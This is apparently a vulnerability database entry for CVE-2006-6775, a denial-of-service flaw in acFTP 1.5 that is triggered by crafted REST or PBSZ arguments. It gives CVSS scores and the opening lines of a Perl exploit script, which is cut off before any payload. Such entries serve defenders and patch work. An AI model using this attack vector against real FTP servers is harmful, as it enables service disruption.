3.5
CVSSv2

CVE-2006-6775

Published: 27/12/2006 Updated: 19/10/2017
CVSS v2 Base Score: 3.5 | Impact Score: 2.9 | Exploitability Score: 6.8
VMScore: 355
Vector: AV:N/AC:M/Au:S/C:N/I:N/A:P

Vulnerability Summary

acFTP 1.5 allows remote authenticated users to cause a denial of service via a crafted argument to the (1) REST or (2) PBSZ command.

Vulnerable Product Search on Vulmon Subscribe to Product

acftp acftp 1.5

Exploits

################################################# # acFTP 15 (REST/PBSZ) Denial of Service # # author: gbr # # mail: gabrielquadros[at]hotmailcom # ################################################# use IO::Socket; if(!defined($ARGV[0])) { print "Usage: $0 ip port\n"; exit; } my $ ...